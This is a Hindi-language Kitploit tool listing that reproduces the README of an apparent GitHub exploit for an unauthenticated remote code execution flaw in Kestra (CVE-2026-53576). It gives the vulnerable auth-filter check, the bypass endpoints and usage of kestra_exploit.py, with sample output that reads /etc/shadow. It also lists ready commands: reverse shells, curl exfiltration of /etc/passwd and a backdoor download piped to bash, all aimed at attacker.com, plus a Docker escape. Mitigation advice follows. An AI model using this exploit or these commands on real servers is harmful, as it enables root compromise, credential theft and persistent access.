Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-53576 — # केस्ट्रा अनअथेंटिकेटेड RCE एक्सप्लॉइट (CVE-2026-53576) | Kitploit
उपकरण/GitHubGitHub/tamatahyt/cve-2026-53576
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंटकंटेनर एस्केप
GitHub
252 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
tamatahyt/cve-2026-53576

CVE-2026-53576

# केस्ट्रा अनअथेंटिकेटेड RCE एक्सप्लॉइट (CVE-2026-53576)

रिपॉजिटरी देखें

Kestra बिना प्रमाणीकरण वाला RCE एक्सप्लॉइट (CVE-2026-53576)

Python License Security Kestra

गंभीर प्रमाणीकरण बायपास जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन की ओर ले जाता है

एक्सप्लॉइट • भेद्यता विवरण • प्रभाव • निवारण


⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।

  • उपयोग न करें उन सिस्टम पर जिनके मालिक आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।
  • उपयोग न करें अवैध गतिविधियों के लिए।
  • लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
  • अपने जोखिम पर उपयोग करें।

📋 विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • एक्सप्लॉइट उपयोग
  • स्थापना
  • उदाहरण
  • प्रभाव
  • निवारण
  • समयरेखा
  • संदर्भ
  • लाइसेंस

🔍 अवलोकन

CVE-2026-53576, Kestra OSS के v1.3.20 तक के संस्करणों में एक गंभीर भेद्यता है, जो प्रमाणीकरण फ़िल्टर बायपास के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देती है।

मुख्य विवरण

विशेषतामान
CVE IDCVE-2026-53576
गंभीरतागंभीर (9.8 CVSS)
भेद्यता प्रकारप्रमाणीकरण बायपास + RCE
प्रभावित उत्पादKestra OSS
प्रभावित संस्करण≤ v1.3.20
हमला वेक्टरनेटवर्क
प्रमाणीकरण आवश्यकनहीं
उपयोगकर्ता सहभागितानहीं

🚨 भेद्यता विवरण

मूल कारण

Kestra में प्रमाणीकरण फ़िल्टर में एक गंभीर तर्क दोष है:

// Vulnerable code in AuthenticationFilter.java:53
boolean isConfigEndpoint = request.getPath().endsWith("/configs")

यह जाँचता है कि क्या कोई भी API अनुरोध /configs पर समाप्त होता है, बजाय सटीक रूट से मेल खाने के। यह हमलावरों को किसी भी एंडपॉइंट पर /configs जोड़कर प्रमाणीकरण बायपास करने की अनुमति देता है।

एक्सप्लॉइटेशन के चरण

  1. दुर्भावनापूर्ण फ्लो बनाएं → POST /api/v1/main/flows/configs (प्रमाणीकरण बायपास करता है)
  2. निष्पादन ट्रिगर करें → POST /api/v1/main/executions/configs/configs (प्रमाणीकरण बायपास करता है)
  3. कमांड रूट के रूप में चलते हैं → पूर्ण सिस्टम समझौता

भेद्य एंडपॉइंट

# Any path ending in /configs bypasses authentication
/api/v1/main/flows/configs          # Create flows
/api/v1/main/executions/configs/configs  # Execute flows
/api/v1/{tenant}/flows/configs      # Any tenant
/api/v1/{tenant}/executions/configs/configs  # Any tenant

💻 एक्सप्लॉइट उपयोग

मूल उपयोग

python3 kestra_exploit.py <target_ip>

उन्नत उपयोग

# Custom port
python3 kestra_exploit.py 192.168.1.100 -p 8080

# HTTPS
python3 kestra_exploit.py 192.168.1.100 --https

# Custom command
python3 kestra_exploit.py 192.168.1.100 -c "whoami && hostname"

# Check Docker socket access
python3 kestra_exploit.py 192.168.1.100 --docker-check

# Clean up after exploitation
python3 kestra_exploit.py 192.168.1.100 --cleanup

# Full attack with all options
python3 kestra_exploit.py 192.168.1.100 -p 8080 --docker-check --cleanup -c "id > /tmp/proof.txt"

कमांड विकल्प

विकल्पविवरण
targetलक्ष्य IP पता या होस्टनाम (आवश्यक)
-p, --portपोर्ट (डिफ़ॉल्ट: 8080)
--httpsHTTP के बजाय HTTPS का उपयोग करें
-c, --commandनिष्पादित करने के लिए कस्टम कमांड
--docker-checkDocker सॉकेट एक्सेस की जाँच करें
--cleanupएक्सप्लॉइटेशन के बाद फ्लो को हटाएं
--delayअनुरोधों के बीच विलंब (डिफ़ॉल्ट: 2s)

📦 स्थापना

आवश्यकताएँ

pip install requests

रिपॉजिटरी क्लोन करें

git clone https://github.com/yourusername/CVE-2026-53576
cd CVE-2026-53576

स्थापना सत्यापित करें

python3 kestra_exploit.py --help

🎯 उदाहरण

उदाहरण 1: मूल एक्सप्लॉइटेशन

python3 kestra_exploit.py 192.168.1.100

आउटपुट:

============================================================
Kestra Unauthenticated RCE Exploit
Security Research Tool - Authorized Use Only!
============================================================
[*] Target: 192.168.1.100:8080
[*] Protocol: http
============================================================

[Step 1] Creating malicious flow...
[*] Creating malicious flow at http://192.168.1.100:8080/api/v1/main/flows/configs
[*] Command: id > /tmp/proof.txt; cat /etc/shadow | head -1 >> /tmp/proof.txt
[+] Flow created successfully! (Status: 200)
[+] Flow revision: 26

[Step 2] Triggering execution...
[*] Triggering execution at http://192.168.1.100:8080/api/v1/main/executions/configs/configs
[+] Execution triggered successfully!
[+] Execution ID: 4nxNTHPk2WInfrnxQa6KF2
[+] Status: CREATED

[Step 3] Checking execution status...
[+] Execution status: SUCCESS
[*] Final status: SUCCESS

[+] Exploitation complete!
[*] To verify the attack succeeded, check the target system for:
    - /tmp/proof.txt containing command output
    - Kestra UI execution logs
    - Web UI: http://192.168.1.100:8080/ui/

उदाहरण 2: रिवर्स शेल

python3 kestra_exploit.py 192.168.1.100 -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

उदाहरण 3: डेटा एक्सफ़िल्ट्रेशन

python3 kestra_exploit.py 192.168.1.100 -c "curl -X POST http://attacker.com/exfil -d @/etc/passwd"

उदाहरण 4: Docker एस्केप जाँच

python3 kestra_exploit.py 192.168.1.100 --docker-check --cleanup

💥 प्रभाव

प्रत्यक्ष प्रभाव

श्रेणीगंभीरताविवरण
गोपनीयता⚠️ गंभीरकोई भी फ़ाइल पढ़ें (पासवर्ड, रहस्य, कॉन्फ़िगरेशन)
अखंडता⚠️ गंभीरफ्लो और डेटा बनाएं/संशोधित करें/हटाएं
उपलब्धता⚠️ उच्चसिस्टम बंद करें, संसाधनों की कमी
प्रमाणीकरण⚠️ गंभीरBasic-Auth का पूर्ण बायपास
विशेषाधिकार वृद्धि⚠️ गंभीरकमांड रूट के रूप में चलते हैं (uid=0)
कंटेनर एस्केप⚠️ गंभीरDocker सॉकेट के माध्यम से होस्ट से समझौता

हमले की क्षमताएँ

एक बिना प्रमाणीकरण वाला हमलावर निम्न कार्य कर सकता है:

  1. रूट के रूप में मनमाने कमांड निष्पादित करें:

    # Read secrets
    cat /app/conf/application.yml
    
    # Reverse shell
    bash -i >& /dev/tcp/attacker.com/4444 0>&1
    
    # Install malware
    curl http://attacker.com/backdoor.sh | bash
    
  2. होस्ट सिस्टम में पिवट करें (यदि Docker सॉकेट माउंटेड है):

    docker run -v /:/host --privileged alpine chroot /host
    
  3. क्लाउड मेटाडेटा एक्सेस करें (यदि क्लाउड प्रदाता पर हैं):

    curl http://169.254.169.254/latest/meta-data/
    

🛡️ निवारण

तत्काल कार्रवाई

  1. भेद्य इंस्टेंस बंद करें:

    sudo systemctl stop kestra
    
  2. सार्वजनिक एक्सेस ब्लॉक करें:

    iptables -A INPUT -p tcp --dport 8080 -j DROP
    
  3. फ़ायरवॉल नियम लागू करें:

    • आंतरिक नेटवर्क तक सीमित करें
    • प्रशासनिक एक्सेस के लिए VPN का उपयोग करें

स्थायी समाधान

  1. Kestra को नवीनतम पैच किए गए संस्करण में अपडेट करें:

    • निगरानी करें: https://github.com/kestra-io/kestra
    • जाँच करें: https://github.com/kestra-io/kestra/security/advisories/GHSA-2q47-568g-9h4f
  2. उचित प्रमाणीकरण लागू करें:

    • Basic Auth के बजाय OAuth2/OIDC का उपयोग करें
    • बहु-कारक प्रमाणीकरण सक्षम करें
  3. कंटेनर हार्डनिंग:

    • गैर-root उपयोगकर्ता के रूप में चलाएं
    • /var/run/docker.sock माउंट न करें
    • रीड-ओनली रूट फाइलसिस्टम का उपयोग करें
  4. नेटवर्क हार्डनिंग:

    • उचित रूटिंग के साथ API गेटवे का उपयोग करें
    • WAF नियम लागू करें
    • अनुरोध सत्यापन सक्षम करें

📅 समयरेखा

टूल डाउनलोड करें